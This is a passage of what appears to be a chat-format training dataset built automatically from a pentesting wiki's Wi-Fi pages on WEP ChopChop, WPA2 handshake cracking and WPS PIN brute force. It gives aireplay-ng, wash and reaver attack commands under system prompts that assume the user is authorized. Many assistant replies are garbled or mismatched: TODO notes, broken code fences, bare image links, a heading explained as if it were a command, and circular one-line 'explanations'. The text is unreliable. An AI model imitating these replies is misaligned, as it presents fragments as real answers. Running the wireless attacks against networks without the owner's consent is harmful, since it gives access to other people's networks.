a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ WEP - ChopChop?"}, {"role": "assistant", "content": "aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ WEP - ChopChop?", "response": "aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface", "metadata": {"corpus_index": 1668, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface`?"}, {"role": "assistant", "content": "This command is used for 🛠️ wep - chopchop. ChopChop"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface`?", "response": "This command is used for 🛠️ wep - chopchop. ChopChop", "metadata": {"corpus_index": 1668, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ WPA2 - Attacks work?"}, {"role": "assistant", "content": "//TODO : differences between CCMP and TKIP for cipher ?"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ WPA2 - Attacks work?", "response": "//TODO : differences between CCMP and TKIP for cipher ?", "metadata": {"corpus_index": 1669, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wpa2/index.md", "page_title": "🛠️ WPA2", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ WPA2 - Attacks?"}, {"role": "assistant", "content": "//TODO : differences between CCMP and TKIP for cipher ?"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ WPA2 - Attacks?", "response": "//TODO : differences between CCMP and TKIP for cipher ?", "metadata": {"corpus_index": 1669, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wpa2/index.md", "page_title": "🛠️ WPA2", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ WPA2 - WPA handshake capture & cracking work?"}, {"role": "assistant", "content": "clients needed\n\nsniffing + deauth\n\ngives \"WPA handshake\" followed by AP MAC addr, possible to crack\n\n![](./assets/wpahandshake.png){.rawimg}\n\neither crack with aircrack directly or use aircrack to create a hashcat formatted file\n\n![](./assets/aircrack_crack.png){.rawimg}\n\npreparing hashcat file\n\n![](./assets/aircrack_hashcat.png){.rawimg}\n\ncracking\n\n![](./assets/hashcat.png){.rawimg}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ WPA2 - WPA handshake capture & cracking work?", "response": "clients needed\n\nsniffing + deauth\n\ngives \"WPA handshake\" followed by AP MAC addr, possible to crack\n\n![](./assets/wpahandshake.png){.rawimg}\n\neither crack with aircrack directly or use aircrack to create a hashcat formatted file\n\n![](./assets/aircrack_crack.png){.rawimg}\n\npreparing hashcat file\n\n![](./assets/aircrack_hashcat.png){.rawimg}\n\ncracking\n\n![](./assets/hashcat.png){.rawimg}", "metadata": {"corpus_index": 1670, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wpa2/index.md", "page_title": "🛠️ WPA2", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ WPA2 - WPA handshake capture & cracking"}, {"role": "assistant", "content": "clients needed\n\nsniffing + deauth\n\ngives \"WPA handshake\" followed by AP MAC addr, possible to crack\n\n![](./assets/wpahandshake.png){.rawimg}\n\neither crack with aircrack directly or use aircrack to create a hashcat formatted file\n\n![](./assets/aircrack_crack.png){.rawimg}\n\npreparing hashcat file\n\n![](./assets/aircrack_hashcat.png){.rawimg}\n\ncracking\n\n![](./assets/hashcat.png){.rawimg}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ WPA2 - WPA handshake capture & cracking", "response": "clients needed\n\nsniffing + deauth\n\ngives \"WPA handshake\" followed by AP MAC addr, possible to crack\n\n![](./assets/wpahandshake.png){.rawimg}\n\neither crack with aircrack directly or use aircrack to create a hashcat formatted file\n\n![](./assets/aircrack_crack.png){.rawimg}\n\npreparing hashcat file\n\n![](./assets/aircrack_hashcat.png){.rawimg}\n\ncracking\n\n![](./assets/hashcat.png){.rawimg}", "metadata": {"corpus_index": 1670, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wpa2/index.md", "page_title": "🛠️ WPA2", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about WPS - Theory?"}, {"role": "assistant", "content": "Wi-Fi Protected Setup (WPS) is a simplified configuration protocol designed to make connecting devices to a secure wireless network easier.\nWPS employs an 8-digit PIN for user network connection, verifying the first 4 digits before proceeding to check the remaining 4. This allows for a potential Brute-Force attack on the first set of digits followed by the second set, with a total of only 11,000 possible combinations.\n\n> [!TIP]\n> Initially it's 20k possible combinations (10^8 =100.000.000 to 10^4+10^4=20.000) but as the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at most (10^4 +10^3=11.000) attempts needed to find the correct PIN.\n\nBelow are some known attacks on Wi-Fi Protected Setup (WPS):\n\n* PIN Brute-Force: Some routers with WPS allow users to connect by entering an 8-digit PIN code. A brute-force attack involves trying all possible combinations until the correct PIN is found.\n* Pixie Dust: This attack exploits a weakness in the generation of WPS encryption keys. It involves exploiting vulnerabilities in certain routers during the creation of WPA/WPA2 encryption keys.\n* PIN Revelation: Certain WPS-enabled routers may reveal information about the validity of the PIN during a connection attempt. This information disclosure can aid an attacker in narrowing down the search space during a brute-force attack.\n* Access Point Enumeration: Some routers with WPS may be vulnerable to an attack that allows an attacker to determine which access points are present in a given area."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about WPS - Theory?", "response": "Wi-Fi Protected Setup (WPS) is a simplified configuration protocol designed to make connecting devices to a secure wireless network easier.\nWPS employs an 8-digit PIN for user network connection, verifying the first 4 digits before proceeding to check the remaining 4. This allows for a potential Brute-Force attack on the first set of digits followed by the second set, with a total of only 11,000 possible combinations.\n\n> [!TIP]\n> Initially it's 20k possible combinations (10^8 =100.000.000 to 10^4+10^4=20.000) but as the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at most (10^4 +10^3=11.000) attempts needed to find the correct PIN.\n\nBelow are some known attacks on Wi-Fi Protected Setup (WPS):\n\n* PIN Brute-Force: Some routers with WPS allow users to connect by entering an 8-digit PIN code. A brute-force attack involves trying all possible combinations until the correct PIN is found.\n* Pixie Dust: This attack exploits a weakness in the generation of WPS encryption keys. It involves exploiting vulnerabilities in certain routers during the creation of WPA/WPA2 encryption keys.\n* PIN Revelation: Certain WPS-enabled routers may reveal information about the validity of the PIN during a connection attempt. This information disclosure can aid an attacker in narrowing down the search space during a brute-force attack.\n* Access Point Enumeration: Some routers with WPS may be vulnerable to an attack that allows an attacker to determine which access points are present in a given area.", "metadata": {"corpus_index": 1671, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through WPS - Theory"}, {"role": "assistant", "content": "Wi-Fi Protected Setup (WPS) is a simplified configuration protocol designed to make connecting devices to a secure wireless network easier.\nWPS employs an 8-digit PIN for user network connection, verifying the first 4 digits before proceeding to check the remaining 4. This allows for a potential Brute-Force attack on the first set of digits followed by the second set, with a total of only 11,000 possible combinations.\n\n> [!TIP]\n> Initially it's 20k possible combinations (10^8 =100.000.000 to 10^4+10^4=20.000) but as the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at most (10^4 +10^3=11.000) attempts needed to find the correct PIN.\n\nBelow are some known attacks on Wi-Fi Protected Setup (WPS):\n\n* PIN Brute-Force: Some routers with WPS allow users to connect by entering an 8-digit PIN code. A brute-force attack involves trying all possible combinations until the correct PIN is found.\n* Pixie Dust: This attack exploits a weakness in the generation of WPS encryption keys. It involves exploiting vulnerabilities in certain routers during the creation of WPA/WPA2 encryption keys.\n* PIN Revelation: Certain WPS-enabled routers may reveal information about the validity of the PIN during a connection attempt. This information disclosure can aid an attacker in narrowing down the search space during a brute-force attack.\n* Access Point Enumeration: Some routers with WPS may be vulnerable to an attack that allows an attacker to determine which access points are present in a given area."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through WPS - Theory", "response": "Wi-Fi Protected Setup (WPS) is a simplified configuration protocol designed to make connecting devices to a secure wireless network easier.\nWPS employs an 8-digit PIN for user network connection, verifying the first 4 digits before proceeding to check the remaining 4. This allows for a potential Brute-Force attack on the first set of digits followed by the second set, with a total of only 11,000 possible combinations.\n\n> [!TIP]\n> Initially it's 20k possible combinations (10^8 =100.000.000 to 10^4+10^4=20.000) but as the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at most (10^4 +10^3=11.000) attempts needed to find the correct PIN.\n\nBelow are some known attacks on Wi-Fi Protected Setup (WPS):\n\n* PIN Brute-Force: Some routers with WPS allow users to connect by entering an 8-digit PIN code. A brute-force attack involves trying all possible combinations until the correct PIN is found.\n* Pixie Dust: This attack exploits a weakness in the generation of WPS encryption keys. It involves exploiting vulnerabilities in certain routers during the creation of WPA/WPA2 encryption keys.\n* PIN Revelation: Certain WPS-enabled routers may reveal information about the validity of the PIN during a connection attempt. This information disclosure can aid an attacker in narrowing down the search space during a brute-force attack.\n* Access Point Enumeration: Some routers with WPS may be vulnerable to an attack that allows an attacker to determine which access points are present in a given area.", "metadata": {"corpus_index": 1671, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain WPS - Practice"}, {"role": "assistant", "content": "Most WPS attacks mentioned below can be conducted using airgeddon (Bash) or wifite2 (Python).\n\n> [!TIP]\n> Monitor mode can be activated automatically with these tools. The monitor section would not needed then.\n\n> [!CAUTION]\n> Some of the commands listed in this section may require high privileges to run. Containers would also need high privileges on a host.\n\nThere are three main methods for setting up a connection using WPS:\n\n* Push Button Configuration (PBC): Press the WPS button on the router and then activate the WPS function on the device to connect. The two devices will automatically establish a connection.\n* PIN based Configuration: Each WPS-enabled device has a unique PIN code. It can be entered on the router through its web interface, or vice versa, to establish the connection.\n* Near Field Communication Configuration: In which the user has to bring the new client close to the access point to allow a near field communication between the devices. NFC Forum–compliant RFID tags can also be used."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain WPS - Practice", "response": "Most WPS attacks mentioned below can be conducted using airgeddon (Bash) or wifite2 (Python).\n\n> [!TIP]\n> Monitor mode can be activated automatically with these tools. The monitor section would not needed then.\n\n> [!CAUTION]\n> Some of the commands listed in this section may require high privileges to run. Containers would also need high privileges on a host.\n\nThere are three main methods for setting up a connection using WPS:\n\n* Push Button Configuration (PBC): Press the WPS button on the router and then activate the WPS function on the device to connect. The two devices will automatically establish a connection.\n* PIN based Configuration: Each WPS-enabled device has a unique PIN code. It can be entered on the router through its web interface, or vice versa, to establish the connection.\n* Near Field Communication Configuration: In which the user has to bring the new client close to the access point to allow a near field communication between the devices. NFC Forum–compliant RFID tags can also be used.", "metadata": {"corpus_index": 1672, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform WPS - Practice?"}, {"role": "assistant", "content": "Most WPS attacks mentioned below can be conducted using airgeddon (Bash) or wifite2 (Python).\n\n> [!TIP]\n> Monitor mode can be activated automatically with these tools. The monitor section would not needed then.\n\n> [!CAUTION]\n> Some of the commands listed in this section may require high privileges to run. Containers would also need high privileges on a host.\n\nThere are three main methods for setting up a connection using WPS:\n\n* Push Button Configuration (PBC): Press the WPS button on the router and then activate the WPS function on the device to connect. The two devices will automatically establish a connection.\n* PIN based Configuration: Each WPS-enabled device has a unique PIN code. It can be entered on the router through its web interface, or vice versa, to establish the connection.\n* Near Field Communication Configuration: In which the user has to bring the new client close to the access point to allow a near field communication between the devices. NFC Forum–compliant RFID tags can also be used."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform WPS - Practice?", "response": "Most WPS attacks mentioned below can be conducted using airgeddon (Bash) or wifite2 (Python).\n\n> [!TIP]\n> Monitor mode can be activated automatically with these tools. The monitor section would not needed then.\n\n> [!CAUTION]\n> Some of the commands listed in this section may require high privileges to run. Containers would also need high privileges on a host.\n\nThere are three main methods for setting up a connection using WPS:\n\n* Push Button Configuration (PBC): Press the WPS button on the router and then activate the WPS function on the device to connect. The two devices will automatically establish a connection.\n* PIN based Configuration: Each WPS-enabled device has a unique PIN code. It can be entered on the router through its web interface, or vice versa, to establish the connection.\n* Near Field Communication Configuration: In which the user has to bring the new client close to the access point to allow a near field communication between the devices. NFC Forum–compliant RFID tags can also be used.", "metadata": {"corpus_index": 1672, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is WPS - Monitor mode?"}, {"role": "assistant", "content": "The default configuration for wireless interfaces is \"Managed\" mode, restricting packet capture to those with a \"Destination MAC\" matching the interface's own MAC address.\nTo capture all packets within a wireless device's range, switch the mode to \"Monitor.\"\n\n::: tabs\n\n=== UNIX-like\n\nThe following native commands can be used to have a capable network interface in monitor mode.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is WPS - Monitor mode?", "response": "The default configuration for wireless interfaces is \"Managed\" mode, restricting packet capture to those with a \"Destination MAC\" matching the interface's own MAC address.\nTo capture all packets within a wireless device's range, switch the mode to \"Monitor.\"\n\n::: tabs\n\n=== UNIX-like\n\nThe following native commands can be used to have a capable network interface in monitor mode.\n\n```bash", "metadata": {"corpus_index": 1673, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform WPS - Monitor mode?"}, {"role": "assistant", "content": "The default configuration for wireless interfaces is \"Managed\" mode, restricting packet capture to those with a \"Destination MAC\" matching the interface's own MAC address.\nTo capture all packets within a wireless device's range, switch the mode to \"Monitor.\"\n\n::: tabs\n\n=== UNIX-like\n\nThe following native commands can be used to have a capable network interface in monitor mode.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform WPS - Monitor mode?", "response": "The default configuration for wireless interfaces is \"Managed\" mode, restricting packet capture to those with a \"Destination MAC\" matching the interface's own MAC address.\nTo capture all packets within a wireless device's range, switch the mode to \"Monitor.\"\n\n::: tabs\n\n=== UNIX-like\n\nThe following native commands can be used to have a capable network interface in monitor mode.\n\n```bash", "metadata": {"corpus_index": 1673, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain re-enable your network interface."}, {"role": "assistant", "content": "ifconfig \"$INTERFACE\" up\n``\n\n=== Aircrack-ng\n\nWith Aircrack-ng (C) installed, the following commands can be used.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain re-enable your network interface.", "response": "ifconfig \"$INTERFACE\" up\n``\n\n=== Aircrack-ng\n\nWith Aircrack-ng (C) installed, the following commands can be used.\n\n``bash", "metadata": {"corpus_index": 1674, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform re-enable your network interface.?"}, {"role": "assistant", "content": "ifconfig \"$INTERFACE\" up\n``\n\n=== Aircrack-ng\n\nWith Aircrack-ng (C) installed, the following commands can be used.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform re-enable your network interface.?", "response": "ifconfig \"$INTERFACE\" up\n``\n\n=== Aircrack-ng\n\nWith Aircrack-ng (C) installed, the following commands can be used.\n\n``bash", "metadata": {"corpus_index": 1674, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out re-enable your network interface. during a pentest?"}, {"role": "assistant", "content": "=== Aircrack-ng\n\n\nWith [Aircrack-ng](https://www.aircrack-ng.org/) (C) installed, the following commands can be used."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out re-enable your network interface. during a pentest?", "response": "=== Aircrack-ng\n\n\nWith [Aircrack-ng](https://www.aircrack-ng.org/) (C) installed, the following commands can be used.", "metadata": {"corpus_index": 1675, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Aircrack-ng`?"}, {"role": "assistant", "content": "This command is used for re-enable your network interface.. re-enable your network interface."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Aircrack-ng`?", "response": "This command is used for re-enable your network interface.. re-enable your network interface.", "metadata": {"corpus_index": 1675, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does WPS - Recon work?"}, {"role": "assistant", "content": "Wash is used to identify nearby WPS-enabled access points along with their main characteristics. It is included in the Reaver (C) package.\n\n``bash\nwash -i \"$INTERFACE\"\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does WPS - Recon work?", "response": "Wash is used to identify nearby WPS-enabled access points along with their main characteristics. It is included in the Reaver (C) package.\n\n``bash\nwash -i \"$INTERFACE\"\n``", "metadata": {"corpus_index": 1676, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on WPS - Recon"}, {"role": "assistant", "content": "Wash is used to identify nearby WPS-enabled access points along with their main characteristics. It is included in the Reaver (C) package.\n\n``bash\nwash -i \"$INTERFACE\"\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on WPS - Recon", "response": "Wash is used to identify nearby WPS-enabled access points along with their main characteristics. It is included in the Reaver (C) package.\n\n``bash\nwash -i \"$INTERFACE\"\n``", "metadata": {"corpus_index": 1676, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the wash command for wps - recon"}, {"role": "assistant", "content": "wash -i \"$INTERFACE\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the wash command for wps - recon", "response": "wash -i \"$INTERFACE\"", "metadata": {"corpus_index": 1677, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "wash"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for WPS - Recon?"}, {"role": "assistant", "content": "wash -i \"$INTERFACE\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for WPS - Recon?", "response": "wash -i \"$INTERFACE\"", "metadata": {"corpus_index": 1677, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `wash -i \"$INTERFACE\"`?"}, {"role": "assistant", "content": "This command is used for wps - recon. Recon"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `wash -i \"$INTERFACE\"`?", "response": "This command is used for wps - recon. Recon", "metadata": {"corpus_index": 1677, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WPS - PIN Brute-Force"}, {"role": "assistant", "content": "In 2011, researcher Stefan Viehböck identified a design and implementation flaw that made PIN-based WPS vulnerable to brute-force attacks. A successful exploitation of this flaw would grant unauthorized individuals access to the network, and the sole effective solution is to disable WPS.\n\nTwo main tools are now available for conducting this attack: Reaver (C) and Bully (C).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WPS - PIN Brute-Force", "response": "In 2011, researcher Stefan Viehböck identified a design and implementation flaw that made PIN-based WPS vulnerable to brute-force attacks. A successful exploitation of this flaw would grant unauthorized individuals access to the network, and the sole effective solution is to disable WPS.\n\nTwo main tools are now available for conducting this attack: Reaver (C) and Bully (C).\n\n```bash", "metadata": {"corpus_index": 1678, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform WPS - PIN Brute-Force?"}, {"role": "assistant", "content": "In 2011, researcher Stefan Viehböck identified a design and implementation flaw that made PIN-based WPS vulnerable to brute-force attacks. A successful exploitation of this flaw would grant unauthorized individuals access to the network, and the sole effective solution is to disable WPS.\n\nTwo main tools are now available for conducting this attack: Reaver (C) and Bully (C).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform WPS - PIN Brute-Force?", "response": "In 2011, researcher Stefan Viehböck identified a design and implementation flaw that made PIN-based WPS vulnerable to brute-force attacks. A successful exploitation of this flaw would grant unauthorized individuals access to the network, and the sole effective solution is to disable WPS.\n\nTwo main tools are now available for conducting this attack: Reaver (C) and Bully (C).\n\n```bash", "metadata": {"corpus_index": 1678, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Verbosity of output (for reaver): -v -vv -vvv?"}, {"role": "assistant", "content": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -vv"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Verbosity of output (for reaver): -v -vv -vvv?", "response": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -vv", "metadata": {"corpus_index": 1679, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Verbosity of output (for reaver): -v -vv -vvv"}, {"role": "assistant", "content": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c 